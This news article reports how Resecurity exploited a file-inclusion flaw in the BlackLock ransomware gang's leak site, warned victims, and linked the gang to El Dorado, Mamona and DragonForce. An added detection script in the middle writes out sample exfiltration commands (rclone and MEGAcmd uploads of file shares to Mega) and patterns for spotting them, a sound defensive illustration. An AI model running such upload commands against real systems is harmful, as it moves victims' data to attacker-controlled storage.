Here's one you don't see every day: A cybersecurity vendor is admitting to breaking into a notorious ransomware crew's infrastructure and gathering data it relayed to national agencies to help victims.
Resecurity said it contributed to the shuttering of the BlackLock ransomware gang's website last week after it found, and subsequently popped, a vulnerability in its Tor-based data leak site (DLS) during the holiday season of 2024.
After finding "a certain misconfiguration" in BlackLock's website, it identified clearnet IP addresses related to the gang's hosting infrastructure, and then exploited a Local File Inclusion (LFI) vulnerability to gather server-side data such as config files and, crucially, credentials.
"Resecurity invested substantial time in hash-cracking threat actors' accounts to take over the infrastructure," it said in a blog post.
Among the data gathered was a history of commands entered over time by one of BlackLock's main operators, known as "$$$," which included copy-and-pasted credentials and amounted to the gang's most significant OPSEC failure, in the US vendor's view.
One of these pasted passwords was also reused across several other accounts managed by one of the operators, said the researchers, which opened up additional avenues for them to understand BlackLock's inner workings.
Resecurity highlighted how reliant the gang was on the popular clearnet file-sharing platform Mega, abusing it as part of its data exfiltration process.
The infoseccers said they found eight email accounts the group used to access Mega, along with the Mega client and the rclone utility it used to transfer victim data from the victims' systems to Mega, and from there on to BlackLock's DLS.
At some point BlackLock was also using Mega to back up stolen data, and in some cases it installed the Mega client on victims' machines so that the exfiltration traffic looked less suspicious.
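A detection-side illustration of the exfiltration chain just described: the script below, an added example rather than anything from Resecurity or the article, scans a constructed process-creation log for rclone runs that target a Mega remote and for MEGAcmd transfer binaries. The log format, hostnames, users and paths are assumptions; the rclone remote syntax (`rclone copy <src> <remote>:<path>`) and the MEGAcmd command names are those of the real tools.

```python
"""Flag command lines that look like rclone or MEGAcmd uploads to Mega."""
import re

# Constructed sample events (timestamp, host, user, command line). The tools
# are real; the hosts, users and paths are made up for this example.
SAMPLE_EVENTS = """\
2024-12-20T02:14:11Z fs01 svc_backup rclone copy /srv/shares/legal mega:dump --transfers 16 -q
2024-12-20T02:15:02Z fs01 svc_backup rclone copy /srv/shares/legal s3:corp-backup-bucket
2024-12-20T03:01:45Z ws17 j.doe "C:\\Program Files\\MEGAcmd\\mega-put.bat" C:\\Users\\j.doe\\Documents\\Cases\\ /export
2024-12-20T03:02:10Z ws17 j.doe notepad.exe C:\\Users\\j.doe\\notes.txt
2024-12-20T04:30:00Z fs01 root rclone sync /var/lib/app/db "mega:backup/$(hostname)"
"""

# rclone remote names are user-defined, so match Mega-flavoured remote names
# following an rclone invocation; MEGAcmd binaries are matched by name.
MEGA_REMOTE = re.compile(r"\brclone\b.*\s['\"]?mega[\w-]*:", re.IGNORECASE)
MEGACMD_BIN = re.compile(r"\bmega-(put|get|sync|login|transfers)(\.bat|\.exe)?\b", re.IGNORECASE)


def parse_event(line):
    """Split one constructed event line into its four fields."""
    ts, host, user, cmd = line.split(" ", 3)
    return {"ts": ts, "host": host, "user": user, "cmd": cmd}


def classify(cmd):
    """Label a command line that uses Mega transfer tooling, else return None."""
    if MEGA_REMOTE.search(cmd):
        return "rclone-to-mega"
    if MEGACMD_BIN.search(cmd):
        return "megacmd-transfer"
    return None


def find_mega_exfil(log_text):
    """Return (host, user, label) for each event that uses Mega transfer tooling."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ev = parse_event(line)
        label = classify(ev["cmd"])
        if label:
            hits.append((ev["host"], ev["user"], label))
    return hits


if __name__ == "__main__":
    for host, user, label in find_mega_exfil(SAMPLE_EVENTS):
        print(f"{host} {user}: {label}")
```

The S3 transfer and the notepad launch are left alone; only the three Mega-bound commands are reported, which is the kind of triage a SOC would run over EDR process telemetry.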
That was the case with one primary legal services provider in France, one of the victims Resecurity was able to alert two days prior to their data being published.
The cybersleuths used their access to understand when BlackLock was planning to leak its data and alerted CERT-FR and ANSSI, the French cybersecurity agency, which then informed the victim.
Resecurity said that less than a week earlier, it was able to give the same heads-up to a Canadian victim after sharing intelligence with the Canadian Centre for Cyber Security. The victim was told about the planned data leakage 13 days prior to the actual publication.
While the security company couldn't prevent attacks from happening, it was able to alert a few victims when the criminals planned to leak their data, allowing them to get their corporate comms in order, it said.
Attribution
All signs point to BlackLock operating out of either Russia or China, if not both. Various pieces of evidence pointed to this, from the cybercrime forum posts/adverts written in both Russian and Chinese, to internal rules about not targeting BRICS and CIS countries, to the main IP addresses associated with the Mega accounts originating from Russia and China.
One Resecurity researcher said they were also able to speak with $$$ via Tox chat, the preferred messaging platform for ransomware crims, and were convincing enough to pass as a genuine cybercriminal, so much so that they successfully registered themselves as a gang affiliate. All the communications here were written in Russian.
Resecurity didn't comment on whether it was able to track down the real identity of $$$, but did link them to the El Dorado and Mamona groups based on Ramp forum posts and analysis of their DLSes.
"For example, following a successful attack against New River Electrical from Ohio, El Dorado Ransomware actors also targeted the College of Veterinary Medicine (Kansas State University) and the City of Pensacola (Florida), which later got published at BlackLock Ransomware DLS," it said.
"The web interface of El Dorado Ransomware DLS was different from BlackLock Ransomware's, but they shared an almost identical list of victims. This overlap may confirm a strong connection between these ransomware projects."
Other infosec researchers including staffers at Tripwire and BlackFog have previously said BlackLock, which launched late last year, was a rebrand of El Dorado which itself launched in March 2024.
$$$ launched Mamona as recently as March 11, 2025, although it was incredibly short-lived. Last week's events, which affected all three brands, both add to the body of evidence linking them and hint at their future.
DragonForce takes over
A fourth ransomware brand relevant to this case is DragonForce, which has been around since 2023 and gained notoriety for targeting Saudi organizations.
As Resecurity noted, BlackLock's DLS was defaced ostensibly by DragonForce on March 19, with config files and internal chats leaked to its front page.
This could indicate that DragonForce found a similar, if not the exact same, LFI vulnerability Resecurity used to compromise the gang, but exploited it a little more noisily than the cybersleuths did.
However, there are multiple signs that DragonForce's apparent breach and defacement was perhaps a false flag operation, one carried out to hide the fact that $$$ potentially defected to DragonForce.
For starters, many of the code modules of BlackLock and DragonForce are identical, Resecurity said in a reverse engineering report.
On February 28, 2025, $$$ also alluded to a possible exit scenario in a Ramp forum post, and as Resecurity noted, expressed no surprise about the defacement of the BlackLock DLS, nor that of Mamona's website a day before.
"It is possible the actor was fully aware that his operations could be already compromised, so the silent 'exit' from the previous project could be the most rational option," said Resecurity.
"Notably, he has not indicated any anger toward DragonForce Ransomware representatives – the opposite, calling them 'gentlemen' – which may confirm these events could be coordinated between them."
The DLSes for both BlackLock and Mamona were quickly taken down after their respective defacements, and the engineers don't expect either brand to return. ®